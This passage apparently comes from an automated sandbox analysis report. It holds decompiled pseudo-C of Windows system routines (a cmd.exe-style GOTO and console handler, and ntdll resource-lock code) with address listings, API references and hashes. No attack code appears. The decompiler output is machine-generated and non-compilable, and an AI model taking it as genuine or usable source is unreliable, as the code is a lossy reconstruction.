											if( *(_t70 + 0x34) == 0) {
												_t100 = 0;
											} else {
												_t65 =  *(_t70 + 0x34);
												_t101 = _t65 + 2;
												do {
													_t85 =  *_t65;
													_t65 = _t65 + _t89;
													__eflags = _t85;
												} while (_t85 != 0);
												_t66 = _t65 - _t101;
												__eflags = _t66;
												_t100 = _t66 >> 1;
											}
											_t74 =  *(_t70 + 0x34);
											__eflags = _t100;
											if(_t100 > 0) {
												_t73 = _t100 + _v8;
												__eflags = _t73 - 0x2000;
												if(_t73 > 0x2000) {
													memcpy( *0x4a574194, _t74, 0x2000 - _v8 + 0x2000 - _v8);
													__eflags = 0;
													 *0x4a590642 = 0;
													E4A556D44(_t74, 0x234f, 1, 0x4a58c642);
													goto L40;
												}
												_t61 =  *0x4a574194; // 0x0
												E4A55185A(_t61, 0x2003 - (_t61 - 0x4a58c640 >> 1), _t74);
												_t63 =  *0x4a574194; // 0x0
												_v8 = _t73;
												 *0x4a574194 = _t63 + _t100 * 2;
											}
											goto L6;
										} else {
											goto L14;
										}
									}
								}
							}
							L42:
						} else {
							_t76 =  *0x4a574194; // 0x0
							 *_t76 = _t40;
							 *0x4a574194 =  *0x4a574194 + _t89;
							_v8 = _v8 + 1;
							if(_t40 != 0xa) {
								L6:
								_t40 =  *_t103 & 0x0000ffff;
								if(_t40 != 0) {
									continue;
								}
							}
						}
						break;
					}
				}
				_t74 =  *0x4a574194; // 0x0
				_t37 = 0;
				 *_t74 = 0;
				 *0x4a574194 = 0x4a58c642;
				if(_v8 > 0x2001) {
					goto L37;
				}
				return E4A55142E(_v16);
				goto L42;
			}




































                                0x4a551ec6
                                0x4a551ece
                                0x4a551ed4
                                0x4a551ed9
                                0x4a551edb
                                0x4a551ee0
                                0x4a566efd
                                0x4a566f05
                                0x4a566f0f
                                0x4a566f0f
                                0x4a566f11
                                0x4a566f16
                                0x4a566f16
                                0x4a566f1c
                                0x4a566f1c
                                0x4a566f22
                                0x4a566f28
                                0x4a566f2e
                                0x4a566f73
                                0x4a566f76
                                0x00000000
                                0x4a566f76
                                0x4a551ef2
                                0x4a551ef7
                                0x4a551efa
                                0x4a551efe
                                0x4a551f05
                                0x4a551f07
                                0x4a551f08
                                0x4a551f09
                                0x4a551f0b
                                0x4a551f0c
                                0x4a551f15
                                0x00000000
                                0x00000000
                                0x4a551f19
                                0x4a551f1d
                                0x4a554e7f
                                0x4a554e85
                                0x4a554e87
                                0x4a55fd7e
                                0x00000000
                                0x4a554e8d
                                0x4a554e8d
                                0x4a554e90
                                0x4a554e93
                                0x4a55e043
                                0x4a55e048
                                0x4a55e04b
                                0x4a55e051
                                0x4a55e051
                                0x00000000
                                0x4a554e99
                                0x4a554e99
                                0x4a554ea0
                                0x4a554eac
                                0x4a554eba
                                0x4a554ec0
                                0x4a554ec5
                                0x4a554ec7
                                0x4a554edd
                                0x4a554edd
                                0x4a554edf
                                0x4a554edf
                                0x4a5551cd
                                0x4a5551cd
                                0x4a5551d1
                                0x4a5551d2
                                0x4a5551d2
                                0x4a5551d9
                                0x4a5551db
                                0x4a5551dd
                                0x4a5551e0
                                0x4a5551e7
                                0x4a566f7d
                                0x4a566f84
                                0x4a566f8a
                                0x4a566f8e
                                0x4a566f93
                                0x4a566f95
                                0x00000000
                                0x4a566f95
                                0x4a5551ee
                                0x4a555202
                                0x4a555206
                                0x4a55520b
                                0x4a555213
                                0x00000000
                                0x4a554ec9
                                0x4a554ec9
                                0x4a554ed0
                                0x4a554ed5
                                0x4a554ed7
                                0x4a55635d
                                0x4a556364
                                0x4a555218
                                0x4a55521b
                                0x4a55636a
                                0x4a566f31
                                0x4a566f36
                                0x4a566f39
                                0x4a55e053
                                0x4a55e053
                                0x4a55e053
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554ed7
                                0x4a554ea2
                                0x4a554ea2
                                0x4a554ea6
                                0x4a556022
                                0x4a556024
                                0x4a556028
                                0x4a55fd77
                                0x4a55602e
                                0x4a55602e
                                0x4a556031
                                0x4a556034
                                0x4a556034
                                0x4a556037
                                0x4a556039
                                0x4a556039
                                0x4a55603e
                                0x4a55603e
                                0x4a556042
                                0x4a556042
                                0x4a556044
                                0x4a556047
                                0x4a556049
                                0x4a556052
                                0x4a55605a
                                0x4a55605c
                                0x4a566f52
                                0x4a566f5c
                                0x4a566f65
                                0x4a566f6b
                                0x00000000
                                0x4a566f70
                                0x4a556062
                                0x4a55607b
                                0x4a556080
                                0x4a556088
                                0x4a55608b
                                0x4a55608b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554ea6
                                0x4a554ea0
                                0x4a554e93
                                0x00000000
                                0x4a551f23
                                0x4a551f23
                                0x4a551f29
                                0x4a551f2c
                                0x4a551f32
                                0x4a551f39
                                0x4a551f3b
                                0x4a551f3b
                                0x4a551f41
                                0x00000000
                                0x00000000
                                0x4a551f41
                                0x4a551f39
                                0x00000000
                                0x4a551f1d
                                0x4a551f44
                                0x4a551f45
                                0x4a551f4b
                                0x4a551f54
                                0x4a551f57
                                0x4a551f62
                                0x00000000
                                0x00000000
                                0x4a551f71
                                0x00000000

                                APIs
                                  • Part of subcall function 4A551896: GetProcessHeap.KERNEL32(00000008,4A5525C0,4A5525BB,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C), ref: 4A5518A9
                                  • Part of subcall function 4A551896: HeapAlloc.KERNEL32(00000000,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C,?,4A556CE6), ref: 4A5518B0
                                • memset.MSVCRT ref: 4A566EFD
                                • longjmp.MSVCRT(4A574AC0,000000FF,?,00004002,4A574210), ref: 4A566F16
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocProcesslongjmpmemset
                                • String ID: 0123456789
                                • API String ID: 2035609091-2793719750
                                • Opcode ID: 58d31f1137de2067a53d7711b15f5ff675c7135fae8f9d699d3dfcc73f301e89
                                • Instruction ID: bb04410ba490c998134880aed2d5a00b03eb5a03da710a5872ba1bce6d0620e8
                                • Opcode Fuzzy Hash: 58d31f1137de2067a53d7711b15f5ff675c7135fae8f9d699d3dfcc73f301e89
                                • Instruction Fuzzy Hash: 9C6145B4A45242EBE710BF68CB44A6D3BB9EF40354F02016BE909FBAADDB345E41C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A554C09, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E4A554C09(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t34;
				intOrPtr _t40;
				void* _t44;
				int _t47;
				intOrPtr _t51;
				intOrPtr _t52;
				void* _t53;
				intOrPtr _t56;
				signed int _t64;
				short* _t65;
				short _t69;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t75;
				signed int _t76;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t95;

				_t75 = _a4;
				_v12 = 1;
				_v8 = 0;
				_v16 = 0;
				_t78 =  *0x4a5740b4 - _t75; // 0x0
				if(_t78 != 0) {
					L23:
					return _v8;
				} else {
					goto L1;
				}
				L25:
				_t73 = _a8;
				__eflags =  *((short*)( *((intOrPtr*)(_t73 + 0x38)))) - 0x3a;
				if( *((short*)( *((intOrPtr*)(_t73 + 0x38)))) != 0x3a) {
					goto L3;
				}
				_t76 = E4A552A34();
				__eflags = _t76;
				if(_t76 == 0) {
					L40:
					return 1;
				}
				 *_t76 = 0;
				_t64 = E4A5519D6(L"GOTO");
				 *((intOrPtr*)(_t76 + 0x38)) = _t64;
				__eflags = _t64;
				if(_t64 == 0) {
					goto L40;
				}
				_t65 = E4A5519D6( *((intOrPtr*)(_t73 + 0x38)));
				 *((intOrPtr*)(_t76 + 0x3c)) = _t65;
				__eflags = _t65;
				if(_t65 == 0) {
					goto L40;
				}
				_t69 = 0x20;
				 *_t65 = _t69;
				 *((intOrPtr*)(_t76 + 0x40)) = 0;
				_v16 = 1;
				L8:
				if(_v12 != 0) {
					__eflags = _t76;
					if(_t76 != 0) {
						_v12 = 0;
					}
				}
				_t44 =  *_t76;
				if(_t44 != 0 ||  *((short*)( *((intOrPtr*)(_t76 + 0x38)))) != 0x3a) {
					if(_v16 != 0) {
						_v16 = 0;
						L13:
						if( *_t76 == 0x3b) {
							L20:
							_t76 =  *((intOrPtr*)(_t76 + 0x38));
						}
						if(_t76 == 0) {
							L36:
							_v8 = 0;
							goto L18;
						}
						if( *_t76 != 0 || E4A5540F2(0x2a,  *((intOrPtr*)(_t76 + 0x38)), 0x4a588640) != 0xffffffff) {
							L17:
							_v8 = E4A551492(2, _t76);
							E4A551605();
							_t47 = GetConsoleOutputCP();
							 *0x4a5741b8 = _t47;
							GetCPInfo(_t47, 0x4a574260);
							_push(0);
							E4A551690();
							goto L18;
						} else {
							_t51 = E4A5518EB( *((intOrPtr*)(_t76 + 0x38)), 0x2a);
							__eflags = _t51;
							if(_t51 != 0) {
								goto L17;
							}
							_t52 = E4A5518EB( *((intOrPtr*)(_t76 + 0x38)), 0x3f);
							__eflags = _t52;
							if(_t52 != 0) {
								goto L17;
							}
							_t53 = E4A553370(0, _t76, 0x4a588640, 0x2000);
							__eflags = _t53 - 2;
							if(_t53 != 2) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t76 + 0x34));
							if(__eflags != 0) {
								__eflags = E4A56E8B8(_a8, _t76);
								if(__eflags == 0) {
									goto L34;
								}
								goto L40;
							}
							L34:
							_t56 = E4A555C8C(0, 0x4a588640, _t76, __eflags, _t76,  *_a4,  *((intOrPtr*)(_a4 + 4)));
							__eflags = _t56;
							if(_t56 != 0) {
								goto L40;
							}
							_v12 = 1;
							goto L36;
						}
					}
					if( *0x4a57408c == 1) {
						__eflags = _t44 - 0x3b;
						if(_t44 == 0x3b) {
							goto L20;
						}
						__eflags =  *0x4a5906ac; // 0x0
						if(__eflags == 0) {
							E4A55C60C(0, _t72, _t73, _t76, __eflags);
							E4A55CB29(_t76, 0);
							_push(0x4a5745a8);
							E4A5558F3();
						}
					}
					goto L13;
				} else {
					L18:
					_t34 = _a4;
					_t95 =  *0x4a5740b4 - _t34; // 0x0
					if(_t95 != 0) {
						goto L23;
					} else {
						_t75 = _t34;
						L1:
						E4A554B2A(_t34);
						 *0x4a5740b8 = 0;
						_t79 =  *0x4a574081; // 0x0
						if(_t79 == 0 || _v12 == 0) {
							goto L3;
						} else {
							goto L25;
						}
					}
				}
				L3:
				_t73 = E4A554D4E(_t75);
				_t81 = _t73 - 0xffffffff;
				if(_t73 == 0xffffffff) {
					goto L40;
				}
				_t40 = E4A551BD2(_t73, _t81, 3, _t73,  *((intOrPtr*)(_t75 + 0x10)));
				_t76 = _t40;
				__imp___tell(_t73);
				_t68 = _a4;
				 *((intOrPtr*)(_a4 + 8)) = _t40;
				E4A553AB3(_t73);
				if(_t76 == 0) {
					goto L18;
				}
				if(_t76 == 1 ||  *0x4a574174 == 0x234a) {
					E4A56EE72();
					__eflags =  *0x4a57408c - 1;
					if( *0x4a57408c == 1) {
						__eflags =  *0x4a5906ac; // 0x0
						if(__eflags == 0) {
							E4A55C60C(0, _t72, _t73, _t76, __eflags);
							E4A5599E1(_t68, 0x2371, 1, 0x4a58c642);
							_t77 = _t77 + 0xc;
						}
					}
					E4A56FCA6(0, _t68, _t72, _t73, _t76);
				}
				if(_t76 == 0xffffffff) {
					goto L23;
				} else {
					goto L8;
				}
			}





























                                0x4a554c13
                                0x4a554c19
                                0x4a554c20
                                0x4a554c23
                                0x4a554c26
                                0x4a554c2c
                                0x4a555816
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555fc4
                                0x4a555fc4
                                0x4a555fca
                                0x4a555fce
                                0x00000000
                                0x00000000
                                0x4a555fd9
                                0x4a555fdb
                                0x4a555fdd
                                0x4a55bc79
                                0x00000000
                                0x4a55bc7b
                                0x4a555fe8
                                0x4a555fea
                                0x4a555fef
                                0x4a555ff2
                                0x4a555ff4
                                0x00000000
                                0x00000000
                                0x4a555ffd
                                0x4a556002
                                0x4a556005
                                0x4a556007
                                0x00000000
                                0x00000000
                                0x4a55600f
                                0x4a556010
                                0x4a556013
                                0x4a556016
                                0x4a554caa
                                0x4a554cad
                                0x4a55575c
                                0x4a55575e
                                0x4a555764
                                0x4a555764
                                0x4a55575e
                                0x4a554cb3
                                0x4a554cb7
                                0x4a554cc5
                                0x4a55d6e5
                                0x4a554cd8
                                0x4a554cdb
                                0x4a5555c0
                                0x4a5555c0
                                0x4a5555c0
                                0x4a554ce3
                                0x4a556dd7
                                0x4a556dd7
                                0x00000000
                                0x4a556dd7
                                0x4a554ceb
                                0x4a554d06
                                0x4a554d0e
                                0x4a554d11
                                0x4a554d16
                                0x4a554d22
                                0x4a554d27
                                0x4a554d2d
                                0x4a554d2e
                                0x00000000
                                0x4a556d78
                                0x4a556d7d
                                0x4a556d82
                                0x4a556d84
                                0x00000000
                                0x00000000
                                0x4a556d8f
                                0x4a556d94
                                0x4a556d96
                                0x00000000
                                0x00000000
                                0x4a556da3
                                0x4a556da8
                                0x4a556dab
                                0x00000000
                                0x00000000
                                0x4a556db1
                                0x4a556db4
                                0x4a564837
                                0x4a564839
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56483f
                                0x4a556dba
                                0x4a556dc3
                                0x4a556dc8
                                0x4a556dca
                                0x00000000
                                0x00000000
                                0x4a556dd0
                                0x00000000
                                0x4a556dd0
                                0x4a554ceb
                                0x4a554cd2
                                0x4a55bc48
                                0x4a55bc4b
                                0x00000000
                                0x00000000
                                0x4a55bc51
                                0x4a55bc57
                                0x4a55bc5d
                                0x4a55bc64
                                0x4a55bc69
                                0x4a55bc6e
                                0x4a55bc73
                                0x4a55bc57
                                0x00000000
                                0x4a554d33
                                0x4a554d33
                                0x4a554d33
                                0x4a554d36
                                0x4a554d3c
                                0x00000000
                                0x4a554d42
                                0x4a554d42
                                0x4a554c32
                                0x4a554c32
                                0x4a554c37
                                0x4a554c3d
                                0x4a554c43
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554c43
                                0x4a554d3c
                                0x4a554c4e
                                0x4a554c54
                                0x4a554c56
                                0x4a554c59
                                0x00000000
                                0x00000000
                                0x4a554c65
                                0x4a554c6b
                                0x4a554c6d
                                0x4a554c74
                                0x4a554c78
                                0x4a554c7b
                                0x4a554c82
                                0x00000000
                                0x00000000
                                0x4a554c8b
                                0x4a5647f5
                                0x4a5647fa
                                0x4a564801
                                0x4a564803
                                0x4a564809
                                0x4a56480b
                                0x4a56481c
                                0x4a564821
                                0x4a564821
                                0x4a564809
                                0x4a564824
                                0x4a564824
                                0x4a554ca4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • _tell.MSVCRT ref: 4A554C6D
                                • GetConsoleOutputCP.KERNEL32 ref: 4A554D16
                                • GetCPInfo.KERNEL32(00000000,4A574260,?,4A5515C5,4A574210,4A55745B,-00000003,00000000,00000000,00000000,00000000,?,00000004,?,4A574210,?), ref: 4A554D27
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleInfoOutput_tell
                                • String ID: GOTO
                                • API String ID: 3312154647-1693823284
                                • Opcode ID: 94ba8f8f03a41b8ce33358de328a6561826304c3ff9e67e9fda0f4828aaffd09
                                • Instruction ID: 82f78686fa5b041ab5753e75f164b0c62d3b58957c517a84af863c371da4610e
                                • Opcode Fuzzy Hash: 94ba8f8f03a41b8ce33358de328a6561826304c3ff9e67e9fda0f4828aaffd09
                                • Instruction Fuzzy Hash: 235124B0801252FBCB21AFA1CB8455D7FB9AF86314F12442FE145AF96EE7309980CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                Download Yara Rule
                                C-Code - Quality: 45%
                                			E022B53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x023701c0;
									_push(_t92);
									_push(0);
									_t37 = E0228F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E022D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E022E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E022E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0231217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E022E3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E022D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E022B5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0228F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E022D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0228F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E022D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0228F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E022D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E022B5329(_t74, _t92);
													_push(1);
													_t48 = E022B53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                0x022b53ab
                                0x022b53ae
                                0x022b53b1
                                0x022b53b4
                                0x022b53b7
                                0x022d05b6
                                0x022d05c0
                                0x022d05c3
                                0x00000000
                                0x022d05c9
                                0x022d05c9
                                0x022d05cc
                                0x022d05d5
                                0x022d05d5
                                0x022b53bd
                                0x022b53bd
                                0x022b53bd
                                0x022b53be
                                0x022b53be
                                0x022b53be
                                0x022b53c0
                                0x00000000
                                0x00000000
                                0x022f2269
                                0x022f226d
                                0x022f2349
                                0x022f234d
                                0x022f2273
                                0x022f2276
                                0x022f2279
                                0x022f227e
                                0x022f2283
                                0x022f2287
                                0x022f228a
                                0x022f228d
                                0x022f228f
                                0x022f22bc
                                0x022f22bc
                                0x022f22bc
                                0x022f22be
                                0x022f22c4
                                0x022f22cc
                                0x022f22d0
                                0x022f22d6
                                0x022f22d7
                                0x022f22da
                                0x022f22df
                                0x022f22e4
                                0x00000000
                                0x00000000
                                0x022f22e6
                                0x022f22e9
                                0x022f22f4
                                0x022f22f9
                                0x022f22fa
                                0x022f2305
                                0x022f2314
                                0x022f2319
                                0x022f231a
                                0x022f231d
                                0x022f2320
                                0x022f2323
                                0x022f2323
                                0x022f2328
                                0x022f232d
                                0x022f232f
                                0x022f2331
                                0x022f2336
                                0x022f2336
                                0x022f233b
                                0x022f233d
                                0x022f2350
                                0x022f2351
                                0x022f2356
                                0x022f2359
                                0x022f2359
                                0x022f235b
                                0x022f235d
                                0x022b5367
                                0x022b536b
                                0x022b5372
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f2363
                                0x022f2363
                                0x022f2369
                                0x022f236a
                                0x022f236c
                                0x022f2371
                                0x022f2373
                                0x00000000
                                0x022f2379
                                0x022f2379
                                0x022f237a
                                0x022f237f
                                0x022f237f
                                0x022f2385
                                0x022f2386
                                0x022f2389
                                0x022f238e
                                0x022f2390
                                0x022b5378
                                0x022b537c
                                0x022f2396
                                0x022f2396
                                0x022f2397
                                0x022f239c
                                0x022f23a2
                                0x022f23a3
                                0x022f23a6
                                0x022f23ab
                                0x022f23ad
                                0x00000000
                                0x022f23b3
                                0x022f23b3
                                0x022f23b4
                                0x022f23b9
                                0x022f23ba
                                0x022f23ba
                                0x022f23bc
                                0x022f23bf
                                0x00000000
                                0x00000000
                                0x022e9153
                                0x022e9158
                                0x022e915a
                                0x022e915e
                                0x022e9160
                                0x00000000
                                0x022e9166
                                0x022e9166
                                0x022e9171
                                0x022e9176
                                0x022e9176
                                0x00000000
                                0x022e9160
                                0x022f23c6
                                0x022f23cb
                                0x022f23ce
                                0x022f23d7
                                0x022f23d7
                                0x022f23ad
                                0x022f2390
                                0x022f2373
                                0x022f233f
                                0x022f233f
                                0x00000000
                                0x022f233f
                                0x022f2291
                                0x022f2291
                                0x022f2293
                                0x022f2295
                                0x022f229a
                                0x022f22a1
                                0x022f22a3
                                0x022f22a7
                                0x022f22a9
                                0x00000000
                                0x00000000
                                0x022f22ab
                                0x022f22ad
                                0x022f22af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f22af
                                0x022f22b1
                                0x022f22b4
                                0x022f22b4
                                0x022f22b6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f22b6
                                0x022f228f
                                0x00000000
                                0x022f226d
                                0x022b53cb
                                0x022b53ce
                                0x022b53d0
                                0x022b53d4
                                0x022b53d6
                                0x00000000
                                0x022b53d8
                                0x022b53e3
                                0x022b53ea
                                0x022b53ea
                                0x022b53d6
                                0x00000000

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022F22F4
                                Strings
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 022F22FC
                                • RTL: Resource at %p, xrefs: 022F230B
                                • RTL: Re-Waiting, xrefs: 022F2328
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-871070163
                                • Opcode ID: 1d1e978df42d6e922c03752daf30047c358385d217fac2ab1a135479b069a158
                                • Instruction ID: b2af616e17b7793cb668a705f7019f4f1226bf51593e3a1e8906b91c399d1ee4
                                • Opcode Fuzzy Hash: 1d1e978df42d6e922c03752daf30047c358385d217fac2ab1a135479b069a158
                                • Instruction Fuzzy Hash: D951EB716217066BEF25EFA4CC80FE67399AF45364F104669FD09DF288EB61E8418B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56C391, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155COMMON
                                Download Yara Rule
                                C-Code - Quality: 89%
                                			E4A56C391(intOrPtr _a4, wchar_t* _a8, intOrPtr _a12) {
				signed int _v8;
				char _v20;
				signed int _v24;
				void* _v28;
				intOrPtr _v32;
				signed short* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				void* _t41;
				wchar_t* _t42;
				void* _t47;
				int _t52;
				signed int _t56;
				signed int _t57;
				short* _t58;
				signed int _t59;
				long _t63;
				void _t64;
				signed int _t68;
				wchar_t* _t72;
				long _t74;
				void* _t75;
				signed int _t79;
				void* _t83;
				signed short* _t85;
				intOrPtr _t88;
				void* _t93;
				void* _t94;
				void* _t95;
				signed int _t97;
				signed int _t98;
				void* _t99;

				_t38 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t38 ^ _t98;
				_t72 = _a8;
				asm("movsd");
				asm("movsd");
				_t41 = _a4 + 8;
				_v24 = _v24 & 0x00000000;
				asm("movsw");
				_v32 = _a12;
				_v36 = _t41;
				_v28 = _t41;
				_t93 = 2;
				do {
					_t42 = _t72;
					_t90 =  &(_t42[0]);
					do {
						_t74 =  *_t42;
						_t42 = _t42 + _t93;
					} while (_t74 != 0);
					_t97 = _t42 - _t90 >> 1;
					if(_t97 > _t93 || iswdigit( *_t72 & 0x0000ffff) == 0) {
						break;
					} else {
						_t63 = _t72[0] & 0x0000ffff;
						if(_t63 == 0 || iswdigit(_t63) != 0) {
							_t64 = wcstol(_t72, 0, 0xa);
							_v28 = _v28 + _t93;
							_t72 = _t72 + 2 + _t97 * 2;
							 *_v28 = _t64;
							_t65 =  *_t72 & 0x0000ffff;
							_t99 = _t99 + 0xc;
							if(( *_t72 & 0x0000ffff) == 0) {
								L29:
								_v24 = _v24 + 1;
								_t75 = 4;
								if(_v24 < _t75) {
									_t94 = _v28;
									_t90 = 0 << 0x10;
									_t79 = _t75 - _v24 >> 1;
									_t52 = memset(_t94, 0xbadbad, _t79 << 2);
									_t95 = _t94 + _t79;
									asm("adc ecx, ecx");
									memset(_t95, _t52, 0);
									_t93 = _t95;
								}
								_t47 = 1;
								L32:
								return E4A5513A9(_t47, _t72, _v8 ^ _t98, _t90, _t93, _t97);
							}
							if(E4A5518EB( &_v20, _t65) != 0) {
								L17:
								_t56 =  *_t72 & 0x0000ffff;
								if(_t56 == 0x70 || _t56 == 0x50) {
									_t83 = 1;
								} else {
									_t83 = 0;
								}
